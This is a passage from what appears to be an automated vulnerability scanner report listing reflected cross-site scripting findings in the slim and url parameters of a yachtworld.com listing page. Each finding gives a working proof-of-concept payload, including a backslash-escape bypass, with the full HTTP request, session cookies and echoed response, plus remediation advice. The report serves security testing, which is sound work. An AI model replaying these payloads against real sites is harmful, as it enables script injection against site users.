Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:02 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<a href='/core/listing/pl_display_photo.jsp?&hosturl=donnellyyachts&&ywo=donnellyyachts&slim=broker2b4a1'><script>alert(1)</script>3043d7ed361&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url='>
...[SNIP]...

3.470. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the slim request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 599e7\'%3balert(1)//e8a2c3e293b was submitted in the slim parameter. This input was echoed as 599e7\\';alert(1)//e8a2c3e293b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker599e7\'%3balert(1)//e8a2c3e293b&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:06 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<a href=\'/core/listing/pl_display_photo.jsp?&hosturl=donnellyyachts&&ywo=donnellyyachts&slim=broker599e7\\';alert(1)//e8a2c3e293b&boat_id=1787065&boatname=32%27+Regulator+32+FS&photo_revised_date=1282081450000&photo_name=Photo+1&photo=20&url=\'>
...[SNIP]...

3.471. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86177"><script>alert(1)</script>1c07972e9b was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker86177"><script>alert(1)</script>1c07972e9b&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:02 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 28646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
<A href="/core/listing/pl_display_photo.jsp?slim=broker86177"><script>alert(1)</script>1c07972e9b&&photo=21&boat_id=1787065&ybw=&boatname=32%27+Regulator+32+FS&hosturl=donnellyyachts&photo_name=Photo+2">
...[SNIP]...

3.472. http://www.yachtworld.com/core/listing/pl_boat_full_detail.jsp [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/pl_boat_full_detail.jsp

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f3bf\'%3balert(1)//8b42d24e13f was submitted in the url parameter. This input was echoed as 8f3bf\\';alert(1)//8b42d24e13f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/pl_boat_full_detail.jsp?slim=broker&boat_id=1787065&ybw=&hosturl=donnellyyachts&&ywo=donnellyyachts&&units=Feet&access=Public&listing_id=65891&url=8f3bf\'%3balert(1)//8b42d24e13f&hosturl=donnellyyachts&&ywo=donnellyyachts& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=1787065&lang=en&slim=broker&&hosturl=donnellyyachts&&ywo=donnellyyachts&
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; latestSavedSearches=1_0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.12.10.1296155835; s_pers=%20s_nr%3D1296156706496%7C1298748706496%3B%20s_lv%3D1296156706498%7C1390764706498%3B%20s_lv_s%3DFirst%2520Visit%7C1296158506498%3B; s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_detail.jsp%2525253F%25252526units%2525253DFeet%25252526id%2525253D1787065%25252526lang%2525253Den%25252526slim%2525253Dbroker%25252526%25252526hosturl%2525253Ddonnellyyachts%25252526%25252526ywo%2525253Ddonnellyyachts%25252526%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/pl_boat_full_detail.jsp%2525253Fslim%2525253Dbroker%25252526boat_id%2525253D1787065%25252526ybw%2525253D%25252526host%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 20:56:45 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 29422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- /opt/weblogic/waeyw/ywcluste
...[SNIP]...
